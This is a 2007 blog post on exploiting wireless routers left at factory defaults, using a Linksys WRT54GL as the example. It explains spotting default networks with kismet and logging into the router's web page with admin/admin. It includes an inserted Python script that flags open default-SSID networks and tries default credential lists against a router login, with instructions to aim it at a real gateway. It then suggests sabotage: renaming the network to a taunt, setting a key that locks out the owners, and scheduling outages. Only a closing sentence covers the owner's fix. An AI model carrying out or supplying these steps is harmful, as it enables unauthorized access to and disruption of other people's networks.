Monday, January 01, 2007

Why default settings on your wireless router are a BAD thing

Lots of people recognize that 802.11 wireless networks are really cool and want one. They go to Best Buy, grab a Linksys router, run home and, without going through the setup wizard, plug the router into their Internet connection and turn it on. Hopefully you are not one of these people, because they leave their router completely open to anyone within radio range who wants to take control of it.

Here, I will show how to discover one of these networks, how to get into it, and what you can do once you are in command. I will be using the Linksys WRT54GL as an example, but the lessons apply to other makes and models as well.

First, the discovery. You're going to need a tool like kismet for this. If you're on Ubuntu Edgy Eft (like me), a simple sudo apt-get install kismet will install it on your machine. If you don't have apt-get or a comparable tool (such as yum on Red Hat flavors), you'll have to download and compile it from source yourself.

Once you have kismet, edit the /etc/kismet/kismet.conf file. Edit the line that begins with "source=" to whatever is appropriate for your card. The line has three comma-separated values. The first is the capture-source type (the driver kismet should use); on Intel cards this is what comes up after the Nickname field of iwconfig | grep Nickname. The second is the wireless interface (something like eth1, also on that same line of the iwconfig output), and the third is whatever you want to name this source. Mine is source=ipw2100,eth1,wireless. More info is in the README under "Capture Sources."

Fire up kismet with sudo kismet (it needs root to put the card into monitor mode). Any detected networks that have the "F" under Flags (and, with color enabled, the line comes up red) are networks with factory-default settings; kismet decides this by matching the BSSID's vendor prefix and the SSID against its list of known defaults. These routers are usually named "linksys" or "NETGEAR" or the like, and typically have no encryption enabled. If you want to change around the interface in kismet, edit the /etc/kismet/kismet_ui.conf file.

Now that you have your target, associate with the network and (hoping that this isn't a honeypot) point your browser to 192.168.1.1. This IP address may vary depending on the make and model of the router you're hacking; NETGEAR routers, for example, are 192.168.0.1. Rather than guessing, check the default gateway the router's DHCP server handed you (route -n or ip route) and browse to that. When prompted for a username and password, enter admin/admin. These are factory-set values; lists of the defaults for other vendors (D-Link, Belkin and so on) are easy to find by searching on the Internet. Congratulations, you're in.
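The two steps above, picking out the factory-default networks from a scan and then trying the default admin login against the gateway's web UI, as a small script. This is an added example, not code from the original post or from kismet: the scan text is constructed to look like iwlist output, the credential table is illustrative rather than exhaustive, and the "router" it logs into is a stub HTTP server on localhost that demands Basic auth with admin/admin, standing in for the WRT54GL. Point probe_router at http://192.168.1.1/ instead of the stub to run it against a real target.

```python
"""Added example: flag factory-default APs in a scan, then try default logins.

Not part of the original post. The scan text, the DEFAULTS table and the
stub router below are constructed for the example.
"""
import base64
import http.server
import re
import threading
import urllib.error
import urllib.request

# Constructed iwlist-style scan output, standing in for what kismet shows.
SAMPLE_SCAN = """\
          Cell 01 - Address: 00:14:BF:AA:BB:CC
                    ESSID:"linksys"
                    Frequency:2.437 GHz (Channel 6)
                    Encryption key:off
          Cell 02 - Address: 00:0F:B5:11:22:33
                    ESSID:"NETGEAR"
                    Frequency:2.462 GHz (Channel 11)
                    Encryption key:off
          Cell 03 - Address: 00:16:B6:44:55:66
                    ESSID:"home-secure"
                    Frequency:2.412 GHz (Channel 1)
                    Encryption key:on
"""

# Vendor-default SSIDs mapped to the LAN address and admin logins those units
# ship with. Assumption: illustrative only, not a complete credential list.
DEFAULTS = {
    "linksys": ("192.168.1.1", [("admin", "admin"), ("", "admin")]),
    "NETGEAR": ("192.168.0.1", [("admin", "password")]),
}


def parse_cells(scan_text):
    """Split iwlist-style output into one dict per AP; field order may vary."""
    cells = []
    for chunk in re.split(r"\n\s*Cell \d+ - ", "\n" + scan_text)[1:]:
        bssid = re.search(r"Address: ([0-9A-Fa-f:]{17})", chunk)
        essid = re.search(r'ESSID:"([^"]*)"', chunk)
        enc = re.search(r"Encryption key:(on|off)", chunk)
        if bssid and essid and enc:
            cells.append({"bssid": bssid.group(1).upper(),
                          "essid": essid.group(1),
                          "encrypted": enc.group(1) == "on"})
    return cells


def find_default_networks(scan_text):
    """Return (essid, bssid, gateway) for each open AP still using a vendor
    default SSID, roughly the networks kismet marks with the F flag."""
    return [(c["essid"], c["bssid"], DEFAULTS[c["essid"]][0])
            for c in parse_cells(scan_text)
            if not c["encrypted"] and c["essid"] in DEFAULTS]


def probe_router(base_url, creds, timeout=3.0):
    """Try each (user, password) pair as HTTP Basic auth against the router's
    web UI; return the first pair it accepts, or None if none work or the
    address is unreachable."""
    for user, password in creds:
        token = base64.b64encode(f"{user}:{password}".encode()).decode()
        req = urllib.request.Request(base_url,
                                     headers={"Authorization": "Basic " + token})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                if resp.status == 200:
                    return (user, password)
        except urllib.error.HTTPError as e:  # 401 means "try the next pair"
            if e.code != 401:
                raise
        except urllib.error.URLError:        # wrong gateway, or no web UI
            return None
    return None


class _StubRouter(http.server.BaseHTTPRequestHandler):
    """Stand-in for the WRT54GL admin page: Basic auth, admin/admin only."""
    ACCEPT = "Basic " + base64.b64encode(b"admin:admin").decode()

    def do_GET(self):
        if self.headers.get("Authorization") == self.ACCEPT:
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(b"<html>Setup - Basic Setup</html>")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="WRT54GL"')
            self.end_headers()

    def log_message(self, *args):  # keep the example quiet
        pass


def start_stub_router():
    """Serve the stub on 127.0.0.1 at an ephemeral port; return the port."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), _StubRouter)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv.server_port


if __name__ == "__main__":
    print("factory-default candidates:", find_default_networks(SAMPLE_SCAN))
    port = start_stub_router()
    print("stub login:", probe_router(f"http://127.0.0.1:{port}/",
                                      DEFAULTS["linksys"][1]))
```

The probe stops at the first accepted pair and treats only a 401 as "keep trying"; anything else (a 403, a redirect to a captive portal, a connection refused) is surfaced or ends the attempt, so a lockout or a honeypot does not get hammered with every pair in the list.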

What to do now? Well, as far as the router is concerned, a lot of things. Change the broadcast SSID of the network to "lol u R h4cked!" under Wireless->Basic Wireless Settings. Turn on WEP or WPA with a key of your choosing in Wireless->Wireless Security so that the legitimate users of the network can no longer connect. In Access Restrictions, set the router so that it ceases to operate for five hours on Tuesdays. Etc. Of course, there are more things you could do by attacking the machines on the network itself, but that's beyond the scope of this entry. The fix for the owner is just as short as the attack: run the setup wizard, set a new admin password, enable WPA and change the SSID.
